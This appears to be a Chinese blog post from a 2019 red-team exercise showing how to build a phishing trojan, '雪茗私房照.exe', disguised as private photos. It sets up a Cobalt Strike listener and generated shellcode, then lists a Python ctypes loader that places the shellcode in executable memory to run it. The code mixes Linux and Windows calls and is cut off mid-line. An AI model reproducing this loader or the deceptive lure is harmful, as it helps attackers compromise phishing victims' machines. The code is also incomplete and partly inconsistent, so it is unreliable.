标签 - 木马

? 木马 ? ? 邮件钓鱼 ?    2020-01-10 17:23:38    1773    0    0

@大家好.... hw.... 练习生 .... 唱 跳 rap 和 篮球...snowming

前言

此文写于护网期间(2019年6月6日),彼时刚刚回国,就碰上了护网,弥足珍贵的经历。

雪茗私房照.exe 主要是 gophish+自己搭建邮件服务器 这篇文章里面用到的木马。

在本文中,详细介绍了此木马文件的制作过程。


第一步、设置 Cobalt Strike 客户端中的 Listener:

title

第二步、payload generator --> 生成shellcode

title

title

title

第三步、python+shellcode 得到 test.py

  1. from ctypes import *
  2. import ctypes
  3. #shellcode代码
  4. #libc = CDLL('libc.so.6')
  5. PROT_READ = 1
  6. PROT_WRITE = 2
  7. PROT_EXEC = 4
  8. def executable_code(buffer):
  9. buf = c_char_p(buffer)
  10. size = len(buffer)
  11. addr = libc.valloc(size)
  12. addr = c_void_p(addr)
  13. if 0 == addr:
  14. raise Exception("Failed to allocate memory")
  15. memmove(addr, buf, size)
  16. if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC):
  17. raise Exception("Failed to set protection on buffer")
  18. return addr
  19. VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
  20. VirtualProtect = ctypes.windll.kernel32.VirtualProtect
  21. shellcode = bytearray(buf)
  22. whnd = ctypes.windll.k